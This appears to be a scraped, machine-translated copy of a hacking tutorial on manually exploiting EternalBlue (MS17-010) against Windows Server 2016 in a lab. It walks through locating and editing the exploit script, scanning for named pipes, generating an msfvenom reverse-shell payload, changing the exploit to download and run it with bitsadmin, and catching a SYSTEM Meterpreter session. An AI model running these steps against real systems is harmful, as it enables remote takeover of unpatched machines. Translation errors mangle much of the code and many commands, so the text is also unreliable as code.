قالب وردپرس درنا توس
Home / Tips and Tricks / How to use EternalBlue on Windows Server manually with MS17-010 Python Exploit «Zero Byte :: WonderHowTo

How to use EternalBlue on Windows Server manually with MS17-010 Python Exploit «Zero Byte :: WonderHowTo



EternalBlue was a devastating exploitation that directed Microsoft's implementation of the SMB protocol. Metasploit contains a useful module that automatically utilizes a target as long as it is vulnerable. But what happens if we want to exploit this vulnerability without Metasploit holding our hand? It can be done with a Python file to utilize EternalBlue manually.

I will not go into the whole games about what EternalBlue is, where the exploitation came from or how SMB works because I already did it in the previous guide on utilizing EternalBlue on Windows Server with Metasploit. So for more background information about what EternalBlue and SMB are and how to find out if a target is vulnerable or not, be sure to check it out before continuing.

In this guide, we take up the manual path to utilize EternalBlue on Windows Server. I use a reloaded copy of Windows Server 201

6 Datacenter as a target, and evaluation copies can be retrieved from Microsoft if you would like to follow each step below.

Step 1: Configure Python-based Utilize

The first thing we need to do is find the exploit file. At Kali, we can use searchsploit in the terminal to search the database for a match.

  searchsploit eternalblue 
  --------------- --------------------------- ----------------------- --------------------------- ----------------------- --------------------------- ----------------------- ----- ---------------------- ------------------
Take advantage of the title | Way
| (/ Usr / share / exploitdb /)
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -------------------- ------------------------------ ----------
Microsoft Windows Windows 7/2008 R2 - EternalBlue & # 39; SMB Remote Code Execution (MS17-010) | exploits / windows / remote / 42031.py
Microsoft Windows Windows 7 / 8.1 / 2008 R2 / 2012 R2 / 2016 R2 - EternalBlue & # 39; SMB Remote Code Execution (MS17-010) | exploits / windows / remote / 42315.py
Microsoft Windows Windows 8 / 8.1 / 2012 R2 (x64) - & # 39; EternalBlue & # 39; SMB Remote Code Execution (MS17-010) | exploits / windows_x86-64 / remote / 42030.py
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -------------------- ------------------------------ ----------
Shell code: No result
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ------------------------------------- ----------
Paper title | Way
| (/ Usr / share / exploitdb papers /)
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ------------------------------------- ----------
How to use ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008 | docs / english / 41896-how-to-exploit-eternalblue-
How to Use ETERNALBLUE on Windows Server 2012 R2 | docs / English / 42,280-how-to-exploit-eternalblue-
[Spanish] How to Use ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008 | docs / spanish / 41897- [spanish] how-to-exploit
[Spanish] How to use ETERNALBLUE on Windows Server 2012 R2 | docs / spanish / 42281- [spanish] how-to-exploit
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------- ------------------------------------- ---------- 

The exploitation we want is labeled 42315.py .

  mkdir exploit 

Now we can copy the exploit file to our newly created directory.

  cp / usr / share / exploitdb / exploits / windows / remote / 42315.py / root / exploit / 

Then change the directory and verify that the file exists.

  cd exploit /
ls 
  42315.py 

Now we can look at the source code for more information about this utilization. This is a fairly long file, so we can use the less command to see it from the top.

  less 42315.py 
  #! / Usr / bin / python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct importpack, unpack, unpack
import sys
import socket
importtid

& # 39; & # 39; & # 39;
MS17-010 exploits for Windows 2000 and later by sleepya

EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

Note:
- Utilization should never crash a goal (chance should be almost 0%)
- Utilization uses the bug as eternity and eternal synergy, so-called tube is necessary

Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
& # 39; & # 39; & # 39;

USERNAME = & # 39; & # 39;
PASSWORD = & # 39; & # 39;

& # 39; & # 39; & # 39;
An empty setting transaction:
- It is allocated from paged pool (same as other transaction types) on Windows 7 and later
- It is allocated from private height (RtlAllocateHeap ()) without using it on Windows Vista and earlier
- no lookaside or caching method to distribute it

Note The method name is from NSA eternity

For Windows 7 and later it is good to use matched pair method (one is large pool and another is fit
for liberated pool from large pool). In addition, the information exploits to control transactions
adjustment before making OOB type. So this exploitation should never crash a target against Windows 7 and later.

... 

This exploitation requires a valid named tube (we will soon come to this) and a valid set of references. These can be any other data from a user who has logged on to the target earlier, including guest accounts. The utilization will automatically upgrade us to a privileged account when it runs.

Before we go any further, it is a good idea to make a copy of this file so that we have access to the original source code. We can rename it exploit.py to keep it simple.

  cp 42315.py exploit.py
ls 
  42315.py exploit.py 

Now we can edit the Python file and enter a valid username and password to use.

  Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
& # 39; & # 39; & # 39;

USERNAME = & # 39; user & # 39;
PASSWORD = & # 39; Password & # 39;

& # 39; & # 39; & # 39;
An empty setting transaction:
- It is allocated from paged pool (same as other transaction types) on Windows 7 and later
- It is allocated from private height (RtlAllocateHeap ()) without using it on Windows Vista and earlier

Traceback (latest call last): [no.
File "exploit.py", line 3, in
from mysmb import MYSMB
ImportError: No module named mysmb

It seems like trying to import a module named mysmb so for this to work, we have to download it. We can easily do that with wget .

  wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
--2019-03-26 11: 25: 44-- https: //raw.githubusercontent. com / worawit / MS17-010 / master / mysmb.py
Solution raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.148.133
Connect to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request sent, waiting for reply ... 200 OK
Length: 16669 (16K) [text / plain]
Save to: & # 39; mysmb.py & # 39;

mysmb.py 100% [=====================================================================================================================>] 16.28K - .- KB / s in 0.03s

2019-03-26 11:25:44 (528 KB / s) - & # 39; mysmb.py & # 39; saved [16669/16669] 

Try to run the file again and we get different results.

  python exploit.py 
  exploit.py  [pipe_name] 

It looks like usage information now, which is a good sign. We need to plug in the IP address of our target and a pipe name as parameters.

Step 2: Find named tubes

Named tubes are a method for running processes to communicate with each other with very little head. Pipes usually appear as files for other processes to attach. Metasploit has a scanner that finds some named pepper on a host. In a new terminal, write msfconsole to postpone it, and we can search for the scanner.

  msfconsole
search tube 
  Matching modules
================

Name Disclosure Date Rank Check Description
------------------ -----------
extra / admin / db2 / db2rcmd 2004-03-04 Normal No DBB db2rcmd.exe security error
extra / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote control Windows Command Execution
extra / dos / http / nodejs_pipelining 2013-10-18 normal Yes Node.js HTTP Pipelining Denial of Service
extra / dos / windows / smb / ms06_063_trans normal No Microsoft SRV.SYS Pipe Transaction No Null
extra / dos / windows / smb / rras_vls_null_deref 2006-06-14 normal No Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
extra / fuzzers / smb / smb_create_pipe normal No SMB Create Pipe Request Fuzzer
extra / fuzzers / smb / smb_create_pipe_corrupt normal No SMB Create Pipe Request Corruption
help / scanner / smb / pipe_auditor normal Yes SMB Session Pipe Auditor
extra / scanner / smb / pipe_dcerpc_auditor normal Yes SMB Session Pipe DCERPC auditor
exploit / linux / misc / accellion_fta_mpipe2 2011-02-07 Excellent No Accellion FTA MPIPE2 Command Execution
exploit / linux / samba / is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename () What modular load
exploit / multi / http / mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight additional injection problems vulnerability
exploit / multi / svn / svnserve_date 2004-05-19 average No Subversion Date Svnserve

... 

The one we want is pipe_auditor .

  use help / scanner Now we can look at the options. 

  alternative 
  Module options (help / scanner / smb / pipe_auditor):

Name Current setting Mandatory Description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named tubes to check
RHOSTS yes Target address range or CIDR identifier
SMBDomain. no Windows domain to use for authentication
SMBPass no Password for the specified username
SMBUser no The username to verify as
Thread 1 yes The number of concurrent thread 

All we really need to do is enter the IP address of our target.

  set rhosts 10.10.0.100 
  rhosts => 10.10.0.100 

And then we can run the scanner.

  run 
  [+] 10.10.0.100:445 - Rör: netlogon, lsarpc,
[*] 10.10.0.100: - Scanned 1 out of 1 hosts (100% complete)
[*] Implementation of supplementary module module 

It seems as if a few named pipes were found. Awesome.

Step 3: Run Exploit File

Now we should be able to run the exploit file. Back in the first terminal from step 1, where we are still in the operator directory, use the target's IP address and one of the specified pipes that we found as parameters.

  python exploit.py 10.10.0.100 netlogon 
  Goal OS: Windows Server 2016 Standard Evaluation 14393
Goals are 64 bits
Received freight size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffff928c5dc1e020
SESSION: 0xffffac016815e210
FLINK: 0xffffac0167062098
InParam: 0xffffac016705c16c
MID: 0x3303
success control of the groom
modify trans1 structure for arbitrary reading / writing
makes this SMB session to SYSTEM
overwrite security security context
create file c: pwned.txt on the target
Ready 

We can see some data spit out on the screen, and at the bottom it says it created a text file on the target. Looking at the goal, we can see that this was successful.

But we want to do more than just create a text file on target. This is just a proof of concept, after all, so we have to do some more things to fully utilize this feature.

Step 4: Paying Payload

We need a payload and a way of exploiting it to get it and implement. For that we can use the MSFvenom to generate some code code, and we can serve it from our machine with Apache.

In a new terminal, use the following command to generate the payload and save it to a file named sc .exe in the default Apache server root.

  msfvenom -a x64 - platform Windows -p windows / x64 / meterpreter / reverse_tcp lhost = 10.10.0.1 lport = 4321 -e x64 / xor -i 5 -f exe -o / var/www/html/sc.exe 
 Found 1 compatible encoder
Try to encode payload with 5 iterations of x64 / xor
x64 / xor succeeded with size 551 (iteration = 0)
x64 / xor succeeded with size 591 (iteration = 1)
x64 / xor succeeded with size 631 (iteration = 2)
x64 / xor succeeded with size 671 (iteration = 3)
x64 / xor succeeded with size 711 (iteration = 4)
x64 / xor selected with end size 711
Load length size: 711 bytes
Final size of exe file: 7168 bytes
Saved as: /var/www/html/sc.exe

This is a long command, so let's break it down:

  • The flag -a sets the architecture as 64-bit. [19659064] The Platform option specifies the platform as Windows.
  • The flag -p indicates the payload.
  • lhost is our local machine
  • lport is the local port to be connected to. The flag -e indicates the encoder to use.
  • - flag indicates the number of iterations that the encoder uses.
  • The flag -f indicates the format.
  • The flag -o indicates the output file. 19659072] Now we can start the Apache server so that exploit can connect to our machine from the target to reach the payload. Next, we will tweak the code to suit our needs.

      service apache2 start 

Step 5: Change the code

Back in exploit.py find the section of code near the bottom that looks like this:

  def smb_pwn (conn, arch) :
smbConn = conn.get_smbconnection ()

print (& # 39; create file c: h pwned.txt on target & # 39;)
tid2 = smbConn.connectTree (& # 39; C $ & # 39;)
fid2 = smbConn.createFile (time2, & # 39; /pwned.txt')
smbConn.closeFile (time2, fid2)
smbConn.disconnectTree (time2)

#smb_send_file (smbConn, sys.argv [0] & # 39; C & # 39 ;, & # 39; /exploit.py')
#service_exec (conn, r & # 39; cmd / c copy c: pwned.txt c: pwned_exec.txt & # 39;)
# Note! There are many methods to get shells over the SMB admin session
# A simple method of getting shells (but easily detected by AV) is
# run binary generated by "msfvenom -f exe-service ..."

def smb_send_file (smbConn, localSrc, remoteDrive, remotePath):
with open (localSrc, & # 39;) as fp:
smbConn.putFile (remoteDrive + & # 39; $ & # 39 ;, remotePath, fp.read) 

Here we can see the code responsible for connecting to the target and creating the text file. We can also see an interesting appearance feature called service_exec () commented on. It will connect to the target and issue a command to copy the previously created text file to a new text file named pwned_exec.txt on the C drive.

First, observe the function and replace after cmd / c with the following command:

  bitadmin / transfer pwn / download http://10.10.0.1/sc.exe C: 

BITSAdmin (Background Intelligent Transfer Service) is a Windows command line tool that is used to upload or download files. The switch / transfer initiates a transfer (named pwn in this case) and / download indicates that it is a download. Then we input the name of the remote file (which is on our machine) and the name of the local file when it is transferred.

Then add another function service_exec () and run the execute file We just transferred. The code will look like this:

  service_exec (conn, r & # 39; cmd / c /sc.exe&#39 😉

Finally, we can comment on the section that creates a text file, because we really don't need it longer. The end code should look like this:

  def smb_pwn (conn, arch):
smbConn = conn.get_smbconnection ()

#print (& # 39; create file c: h pwned.txt on target & # 39;)
# tid2 = smbConn.connectTree (& # 39; C $ & # 39;)
# fid2 = smbConn.createFile (time2, & # 39; /pwned.txt')
# smbConn.closeFile (time2, fid2)
# SmbConn.disconnectTree (time2)

#smb_send_file (smbConn, sys.argv [0] & # 39; C & # 39 ;, & # 39; /exploit.py')
service_exec (conn, rd & c bitsadmin / transfer pwn / download http://10.10.0.1/sc.exe C: sc.exe & # 39;)
service_exec (conn, rd / c / c /sc.exe & # 39;)
# Note! There are many methods to get shells over the SMB admin session
# A simple method of getting shells (but easily detected by AV) is
# run binary generated by "msfvenom -f exe-service ..."

def smb_send_file (smbConn, localSrc, remoteDrive, remotePath):
with open (localSrc, & # 39;) as fp:
smbConn.putFile (remoteDrive + & # 39; $ & # 39 ;, remotePath, fp.read) 

Now all we have left to do is now run exploit.

Step 6: Run the finished use

To complete the utilization, we need something to catch the shell when the payload is executed. We can use multipurpose trades in the Metasploit for this. In a new terminal, use the following commands.

  msfconsole
used exploit / multi / handler 

You should see the "exploit (multi / handler)" prompt. We just need to set the payload to match what we stated when we created the shell code earlier, which in this case is a reverse TCP shell.

  Enter payload window / x64 / meterpreter / reverse_tcp 
  payload => windows / x64 

  set lhost 10.10.0.1 
  lhost => 10.10.0.1 

And the listening port.

  set lport 4321 
  lport => 4321 

And we can start the manager.

  run 
  [*] Started reverse TCP manager at 10.10.0.1:4321

It listens to incoming connections and if everything goes smoothly, we will get a Meterpreter session when our utilization is completed.

Finally, we should have everything in place and ready to go. We can start utilizing just as we did earlier in our test drive from the user group.

  python exploit.py 10.10.0.100 netlogon 
  Goal OS: Windows Server 2016 Standard Evaluation 14393
Goals are 64 bits
Received freight size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffff928c5dc48020
SESSION: 0xffffac0165773250
FLINK: 0xffffac0167056098
InParam: 0xffffac016705016c
MID: 0x2a07
success control of the groom
modify trans1 structure for arbitrary reading / writing
makes this SMB session to SYSTEM
overwrite security security context
Opens SVCManager on 10.10.0.100 .....
Create service Jepa .....
Start service Jepa .....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or check request in time.
Remove service Jepa .....
Opens SVCManager on 10.10.0.100 .....
Create service YTXT .....
Startup service YTXT .....
The NETBIOS connection with the remote host was turned off.
Delete the YTXT ..... service
ServiceExec Error on: 10.10.0.100
nca_s_proto_error
Ready 

This time, we should see different results. Ignore the errors, and if it doesn't work for the first time, just try again. When the exploitation is completed, we should see a session open again on our listener.

  [*] Transmission steps (206403 bytes) to 10.10.0.100
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.100:51057) at 2019-03-26 11:49:38 -0500

meterpreter> 

We can verify that we have compromised the target with the command sysinfo .

  sysinfo 
  Computer: DC01
OS: Windows 2016 (Build 14393).
Architecture: x64
System Language: en_US
Domain: DLAB
Log in to users: 4
Meterpreter: x64 / windows 

and getuid command.

  getuid 
  Server username: NT AUTHORITY SYSTEM 

And there we have it - a full Meterpreter session from manual exploitation of EternalBlue.

Wrapping Up

In this guide, we dealt with how to manually use EternalBlue on Windows Server. We started by posting some things to get proof of the concept to work. Then we generated some shell code and rented the payload on our machine. Then we changed the code, launched the exploitation and succeeded with a Meterpreter session on the target. Although Metasploit contains a module to do all of this automatically, it is beneficial to know how to do things on the difficult path, only if something needs to be adapted for a particular goal or scenario.

Cover image of Pixabay / Pexels; Screenshots of drd_ / Zero Byte

Source link